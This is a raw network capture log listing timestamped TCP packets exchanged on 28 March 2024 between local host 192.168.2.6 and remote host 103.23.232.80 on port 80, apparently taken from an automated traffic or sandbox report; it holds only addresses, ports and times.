                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298542023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298599958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298674107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298819065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298855066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298868895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298897028 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298913002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298929930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298958063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299086094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299134016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299137115 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299174070 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299216032 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299228907 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299264908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299449921 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299463034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299475908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299493074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299521923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299529076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299577951 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299582958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299622059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299716949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299730062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299779892 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299793005 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299833059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299911976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299925089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299962044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.299973965 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300008059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300091028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300137997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300184011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300302982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300343990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300359011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300396919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300451040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300515890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300565004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300600052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300652027 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300685883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300796986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300806999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300838947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300846100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300888062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.300983906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301033974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301055908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301070929 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301080942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301122904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301167011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301218033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301218033 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301256895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301270008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301326036 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301326990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301390886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301404953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301436901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301469088 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301513910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301526070 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301552057 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301564932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301959991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.301973104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302031994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302035093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302088022 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302126884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302171946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302175999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302201986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302242994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302274942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302314043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302395105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302439928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302468061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302508116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302510023 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302566051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302592993 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302615881 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302642107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302684069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302736044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302833080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302850008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302877903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302915096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.302958012 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303031921 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303045034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303085089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303086042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303122997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303123951 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303164005 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303190947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303230047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303239107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303277016 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303292990 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303334951 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303391933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303502083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303546906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303585052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303622007 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303770065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303782940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303793907 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.303809881 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304001093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304013014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304024935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304029942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304029942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304037094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304053068 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304079056 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304104090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304116011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304157972 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304158926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304214001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304248095 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304282904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304302931 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304330111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304331064 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304359913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304410934 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304440022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304485083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304485083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304531097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304580927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304606915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304651022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304655075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304694891 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304721117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304784060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304799080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304841042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304856062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304900885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.304965019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305007935 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305011988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305053949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305053949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305094004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305120945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305166960 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305181026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305315018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305356026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305361986 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305397987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305424929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305469036 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305619955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305632114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305643082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305690050 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305690050 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305738926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305759907 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305785894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305797100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305823088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305866003 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305867910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305955887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.305973053 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306000948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306003094 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306035995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306093931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306106091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306138992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306164026 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306281090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306293011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306315899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306333065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306391001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306405067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306433916 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306457043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306483030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306538105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306550026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306575060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306600094 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306624889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306664944 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306691885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306727886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306766987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306816101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306858063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.306972027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307014942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307152033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307193995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307240963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307286024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307312965 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307358980 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307416916 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307492971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307493925 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307532072 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307544947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307590008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307765007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307782888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307792902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307805061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307832956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307849884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307883024 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307908058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307924986 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307950974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.307979107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308010101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308027983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308092117 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308119059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308130980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308161020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308178902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308250904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308264017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308290958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308305025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308340073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308351994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308389902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308398962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308435917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308445930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308479071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308484077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308523893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308582067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308631897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308648109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308695078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308722019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308734894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.308778048 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309250116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309274912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309286118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309289932 CET4971880192.168.2.6103.23.232.80
